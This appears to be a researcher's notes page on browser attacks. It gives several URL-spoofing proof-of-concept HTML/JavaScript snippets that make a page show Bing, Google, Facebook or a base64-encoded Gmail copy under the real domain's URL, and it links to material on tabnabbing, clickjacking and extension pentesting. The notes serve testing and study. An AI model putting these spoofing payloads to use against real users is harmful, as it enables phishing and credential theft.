Link to this headingBrowser Exploits

Link to this headingUrl Spoofing

https://github.com/rafaybaloch/SOP-Bypass-Mini-Test-Suite

setInterval href:

<script> document.write("<h1>This is not Bing</h1>"); location.href = "https://bing.com:8081"; setInterval(function(){location.href="https://bing.com:8080"},2000); </script>

setInterval location:

<script> function spoof() { document.write("<h1>This is not Bing</h1>"); document.location = "https://bing.com:1234"; setInterval(function(){document.location="https://bing.com:1234";},9800); }; </script> <p class="test"><input class="btn btn-success btn-lg" type="button" value="Run test case" onclick="spoof();" /> </p>

Stop Window Open:

<p class="test"><input class="btn btn-success btn-lg" type="button" value="Run test case" onclick="win = window.open('https://www.facebook.com:8080','WIN'); window.open('https://www.bing.com', 'WIN'); win.window.stop(); win.document.write('This is not Facebook'); win.document.close(); " /></p>

Hidden Schema:

<h2>Spoof 13</h2> <script> function pocccc(){ var w=open('data://google.com'); w.document.body.innerHTML='This is not google'; } </script> <p class="test"><input class="btn btn-success btn-lg" type="button" value="Run test case" onclick="pocccc();" /> </p>

location assign:

<script> function spoof() { var gmail = 'PCFET0NC8+KArOK........ZHk+PC9odG1sPg=='; //The base64 encoded version of the Gmail page x=document.body.innerHTML=atob(gmail); document.write("<title>Gmail</title>"); document.write("x"); window.location.assign("https://www.gmail.com:8080"); } setInterval(spoof(),100000); </script>

Link to this headingDomain name issues

https://tkte.ch/articles/2024/03/15/parsing-urls-in-python.html

Link to this headingReverse Tabnabbing

https://www.comparitech.com/blog/information-security/reverse-tabnabbing/

Link to this headingClickJacking

Using Hidden UI elements above to trick a user into clicking on a button or link on another page when they were intending to click on the top level page.

This can be prevented by using

  • Content Security Policy: frame-ancestors/frame-src/child-src
  • X-Frame-Options

Link to this headingCertificates

https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/

Link to this headingExtensions

https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology

Link to this headingURL Renaming

Change the URL in the URL bar but have custom HTML:

<p> <button type="button" value="Test Case" onclick="win = window.open('https://www.google.com'); win.window.stop(); win.document.write('<h1>URL Hijacked</h1>'); win.document.close() "></button> </p>